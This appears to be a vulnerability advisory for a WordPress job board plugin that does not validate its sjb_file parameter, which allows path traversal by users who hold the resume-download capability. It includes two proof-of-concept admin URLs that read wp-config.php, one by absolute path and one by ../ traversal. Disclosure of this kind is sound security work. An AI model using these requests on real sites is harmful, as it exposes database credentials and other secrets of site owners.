The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack
The sjb_file parameter to use may depends on the configuration of the plugin, e.g: https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=var/www/wp-config.php https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../wp-config.php
2021-01-15 (about 2 years ago)
2021-01-15 (about 2 years ago)
2021-01-23 (about 2 years ago)